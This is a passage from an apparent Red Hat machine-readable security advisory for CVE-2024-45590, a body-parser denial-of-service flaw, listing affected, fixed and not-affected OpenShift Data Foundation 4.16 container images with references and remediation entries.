"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
